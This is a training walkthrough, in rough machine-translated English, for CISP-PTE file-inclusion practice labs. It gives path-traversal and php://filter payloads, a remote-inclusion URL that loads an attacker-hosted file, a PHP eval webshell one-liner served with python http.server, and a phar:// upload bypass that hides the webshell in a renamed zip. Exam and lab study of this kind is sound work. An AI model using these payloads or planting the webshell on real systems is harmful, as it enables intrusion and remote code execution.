当前位置:网站首页>2022 cisp-pte (I) document contains
2022 cisp-pte (I) document contains
2022-06-27 06:36:00 【A τθ】
One 、 The local file contains ( Basics )
1、 The first
2、 The second way
....//....//flag.txt
3、 The third way
....//....//flag.txt%00
4、 The fourth way
....//....//....//flag.txt%00
Two 、 The local file contains ( Practice )
1、 The first
php://filter/convert.base64-encode/resource=../key.php
2、 The second way
2.1 Check the source code of the answer page
Check the source code of the answer page , No useful information .
Direct access view.html file , And look at the source code .
2.2 Pass in the parameter
2.3 View source code
3、 ... and 、 The remote file contains ( Practice )
1、 The first
1.1 Open questions
1.2 A preliminary attempt to
1.3 The remote file contains
Cannot truncate , Switch to a remote file that contains .
1.4 Ant sword link
http://49.235.78.245:1117/start/index.php?page=http://49.235.78.245/1
2、 Start a remote server locally
2.1 Put a sentence in the user directory
1.txt
<?php @eval($_POST['c']);?>
Catalog :
C:\Users\Administrator
2.2 start-up
python3 perform :python3 -m http.server
python2 perform : python2 -m SimpleHTTPServer
2.3 success
http://192.168.1.107:8000/1.txt
3、 The second way
3.1 View topic source code
3.2 Read include.php and upload.php Source code
php://filter/convert.base64-encode/resource=include
<html>
Tips: the parameter is file! :)
<!-- upload.php -->
</html>
<?php
@$file = $_GET["file"];
if(isset($file))
{
if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
{
echo "<p> error! </p>";
}
else
{
include($file.'.php');
}
}
?>
<form action="" enctype="multipart/form-data" method="post"
name="upload">file:<input type="file" name="file" /><br>
<input type="submit" value="upload" /></form>
<?php
if(!empty($_FILES["file"]))
{
echo $_FILES["file"];
$allowedExts = array("gif", "jpeg", "jpg", "png");
@$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
|| (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
|| (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
&& (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
{
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "file upload successful!Save in: " . "upload/" . $_FILES["file"]["name"];
}
else
{
echo "upload failed!";
}
}
?>
3.3 Upload files
180.php:
<?php @eval($_POST['c']);?>
1、180.php Write a sentence ;
2、180.php Compress it into 180.zip;
3、 rewrite 180.zip by 180.jpg
3.4 Read the file
?file=phar://upload/180.jpg/180
c=phpinfo();
3.5 Linked ant sword
边栏推荐
- matlab GUI界面仿真直流电机和交流电机转速仿真
- 693. alternate bit binary number
- Configuration of vscode korofileheader
- 记一次Spark报错:Failed to allocate a page (67108864 bytes), try again.
- JVM常用指令
- Meaning of 0.0.0.0:x
- [cultivation system] common regular expressions
- Tidb basic functions
- IDEA一键生成Log日志
- Altium Designer 19 器件丝印标号位置批量统一摆放
猜你喜欢
随机推荐
Meaning of 0.0.0.0:x
Thesis reading skills
Scala之偏函数Partial Function
LeetCode 0086.分隔链表
HTAP 深入探索指南
Redis 缓存穿透、缓存击穿、缓存雪崩
TiDB 数据库快速上手指南
2018 mathematical modeling competition - special clothing design for high temperature operation
Altium designer 19 device silk screen label position shall be placed uniformly in batches
Proxy reflect usage details
快速实现单片机和手机蓝牙通信
MPC control of aircraft wingtip acceleration and control surface
Matlab GUI interface simulation DC motor and AC motor speed simulation
聊聊领域驱动设计
JVM常用指令
427-二叉树(617.合并二叉树、700.二叉搜索树中的搜索、98. 验证二叉搜索树、530.二叉搜索树的最小绝对差)
快速实现Thread Mesh组网详解
TiDB 基本功能
Dev++ environment setting C language keyword display color
JVM object composition and storage